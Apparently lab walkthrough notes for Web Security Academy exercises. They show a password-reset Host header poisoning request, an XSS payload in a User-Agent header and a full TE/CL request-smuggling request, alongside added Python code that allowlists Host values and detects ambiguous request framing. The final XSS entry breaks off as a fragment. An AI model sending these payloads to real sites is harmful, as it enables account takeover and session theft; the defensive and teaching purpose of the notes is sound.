Stage 1
Example 1
Host Header Poisoning
Go to the forgot-password page and enter carlos as the username. Intercept the request and change the Host header to the exploit server URL:
POST /forgot-password HTTP/1.1
Host: ...web-security-academy.net
Cache-Control: max-age=0
Check the exploit server's access log and you will find the password reset token:
/resources/js/tracking.js HTTP/1.1" 404 "User-Agent: Mozilla/5.0 (Windows NT 10...
/forgot-password?temp-forgot-password-token=... HTTP/1.1"
/log HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
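The defence against the poisoning above is to never build the reset link from the client-supplied Host header. The following is an added example, not code from the original notes: the framework, the request shape and the hostnames are assumptions, and the two functions put the insecure pattern beside the hardened one (allowlisted Host, fixed server-side origin).

```python
"""Mitigation for Host header poisoning in password-reset links.

Added example (not code from the original notes). The ``headers`` dict,
the hostnames and the URL layout are assumptions. The check itself is the
standard one: derive the link's authority from server-side configuration,
and refuse reset requests whose Host (or X-Forwarded-Host) is not in an
explicit allowlist.
"""
from urllib.parse import urlencode

# Server-side configuration (constructed placeholder values).
CANONICAL_ORIGIN = "https://app.example"
ALLOWED_HOSTS = {"app.example", "www.app.example"}


def _effective_host(headers: dict) -> str:
    """Return the host a naive application would trust, lowercased, without port.

    Many frameworks honour X-Forwarded-Host ahead of Host, so both are treated alike.
    Header names are assumed to be exact-case keys of ``headers``.
    """
    raw = headers.get("X-Forwarded-Host") or headers.get("Host") or ""
    return raw.split(",")[0].strip().split(":")[0].lower()


def build_reset_url_vulnerable(headers: dict, token: str) -> str:
    """Insecure pattern: the link's authority comes from the attacker-controlled Host."""
    query = urlencode({"temp-forgot-password-token": token})
    return f"https://{_effective_host(headers)}/forgot-password?{query}"


def build_reset_url(headers: dict, token: str) -> str:
    """Hardened pattern: validate Host against an allowlist, then use the configured origin."""
    host = _effective_host(headers)
    if host not in ALLOWED_HOSTS:
        # Worth logging: a mismatched Host on a reset request is either a
        # poisoning attempt or a reverse-proxy misconfiguration.
        raise ValueError(f"rejected password reset for unexpected Host {host!r}")
    # The authority is fixed server-side, so the emailed link can never point elsewhere.
    query = urlencode({"temp-forgot-password-token": token})
    return f"{CANONICAL_ORIGIN}/forgot-password?{query}"


if __name__ == "__main__":
    token = "constructed-token-0000"          # constructed sample token
    legit = {"Host": "app.example"}
    poisoned = {"Host": "attacker-controlled.example"}
    print(build_reset_url_vulnerable(poisoned, token))  # token would be sent to the wrong host
    print(build_reset_url(legit, token))
    try:
        build_reset_url(poisoned, token)
    except ValueError as e:
        print("blocked:", e)
```

The allowlist must be compared after stripping the port and lowercasing, as `_effective_host` does, so that `App.Example:8443` and `app.example` are treated as the same host rather than one slipping past a case-sensitive check.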
Example 2
XSS via HTTP Request Smuggling
Open one of the posts and modify the User-Agent header to confirm that an alert pops up:
Upgrade-Insecure-Requests: 1
User-Agent: "><script>alert(document.cookie)</script>
Accept: ...
Send the following request to Intruder and send it with null payloads about 100 times.
POST /?USSK=1059000963 HTTP/1.1
Host:
Cookie: _lab=; session=; _lab_analytics=
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="93"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Transfer-Encoding: ORHFKSuL
Content-Length: 25

f
du60v=x&h94ed=x
0

GET /post?postid=1 HTTP/1.1
Host:
User-Agent: ">
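The request above only works because the front end and back end disagree about where it ends: it carries two Transfer-Encoding headers, one of them an obfuscated value, alongside a Content-Length. A proxy or WAF that enforces unambiguous framing rejects such a request before it is forwarded. The following is an added example, not code from the original notes or from any proxy product: a small framing checker run over a constructed request modelled on the one above and over a clean one. The policy it enforces (only a bare `chunked` is accepted, never both framing headers, no folded or oddly spaced header lines) is stricter than what RFC 9112 permits, and is the policy a security-conscious front end would choose.

```python
"""Detecting ambiguous HTTP/1.1 request framing, the precondition for request smuggling.

Added example (not part of the original notes). The sample requests below are
constructed. A request is flagged when its framing could be read two ways:
Transfer-Encoding together with Content-Length, more than one Transfer-Encoding
header, a Transfer-Encoding value other than a plain "chunked", duplicate or
non-numeric Content-Length, or obsolete line folding / whitespace tricks in
the header block. Each of these is something different servers parse differently.
"""
from typing import List


def framing_findings(raw: bytes) -> List[str]:
    """Return a list of framing problems in a raw HTTP/1.1 request (empty if none).

    Only the header block (up to the first blank line) is examined; the body is
    irrelevant to the decision, which is the point: the request is rejected
    before anyone has to agree on where the body ends.
    """
    findings: List[str] = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    header_lines = head.split(b"\r\n")[1:]  # index 0 is the request line
    te_values: List[bytes] = []
    cl_values: List[bytes] = []

    for line in header_lines:
        if line[:1] in (b" ", b"\t"):
            # obs-fold: a continuation line that some parsers glue to the
            # previous header and others treat as garbage.
            findings.append("obsolete line folding in header block")
            continue
        if b":" not in line:
            findings.append(f"malformed header line {line!r}")
            continue
        name, value = line.split(b":", 1)
        if name != name.strip():
            # "Transfer-Encoding : chunked" is seen as TE by lenient parsers only.
            findings.append(f"whitespace around header name {name!r}")
        lname = name.strip().lower()
        if lname == b"transfer-encoding":
            te_values.append(value.strip())
        elif lname == b"content-length":
            cl_values.append(value.strip())

    if te_values and cl_values:
        findings.append("both Transfer-Encoding and Content-Length present")
    if len(te_values) > 1:
        findings.append(f"{len(te_values)} Transfer-Encoding headers")
    for v in te_values:
        if v.lower() != b"chunked":
            # Strict policy: anything but the exact token (e.g. "xchunked",
            # "chunked\x0b", or a random word) is treated as an evasion attempt.
            findings.append(f"non-canonical Transfer-Encoding value {v!r}")
    if len(cl_values) > 1 or any(not v.isdigit() for v in cl_values):
        findings.append("duplicate or non-numeric Content-Length")
    return findings


# Constructed request modelled on the smuggling request in the notes.
SMUGGLING_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Transfer-Encoding: ORHFKSuL\r\n"
    b"Content-Length: 25\r\n"
    b"\r\n"
    b"f\r\ndu60v=x&h94ed=x\r\n0\r\n\r\n"
)

# Constructed request with a single, unambiguous framing header.
CLEAN_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 15\r\n"
    b"\r\n"
    b"du60v=x&h94ed=x"
)

if __name__ == "__main__":
    for label, req in (("smuggling", SMUGGLING_REQUEST), ("clean", CLEAN_REQUEST)):
        print(label, "->", framing_findings(req) or "no findings")
```

Rejecting rather than "fixing" the request matters: a front end that silently drops one of the two headers and forwards the rest has merely chosen which desynchronisation the back end will see.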
Example 3
XSS
?searchterm=">